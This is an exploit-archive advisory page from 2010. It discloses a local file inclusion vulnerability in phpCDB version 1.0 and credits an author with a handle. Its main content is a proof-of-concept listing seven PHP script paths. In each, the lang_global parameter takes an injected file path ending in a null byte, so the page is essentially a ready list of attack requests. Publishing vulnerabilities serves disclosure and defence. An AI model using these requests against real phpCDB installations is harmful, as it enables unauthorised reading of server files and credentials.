[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpCDB <= 1.0 Local File Include Vulnerability
# Published : 2010-02-27
# Author : cr4wl3r
# Previous Title : Project Man <= 1.0 (Auth Bypass) SQL Injection Vulnerability
# Next Title : phpRAINCHECK <= 1.0.1 SQL Injection Vulnerability
##############################################################
##phpCDB <= 1.0 Local File Include Vulnerability
##############################################################
Author: cr4wl3r <cr4wl3rx40linuxmailx2Eorg>
Download: http://sourceforge.net/projects/phpcdb/files/
##############################################################
PoC:
[phpcdb_path]/firstvisit.php?lang_global=[LFI%00]
[phpcdb_path]/newfolder.php?lang_global=[LFI%00]
[phpcdb_path]/showfolders.php?lang_global=[LFI%00]
[phpcdb_path]/newlang.php?lang_global=[LFI%00]
[phpcdb_path]/showinnerfolder.php?lang_global=[LFI%00]
[phpcdb_path]/writecode.php?lang_global=[LFI%00]
[phpcdb_path]/showcode.php?lang_global=[LFI%00]
##############################################################txt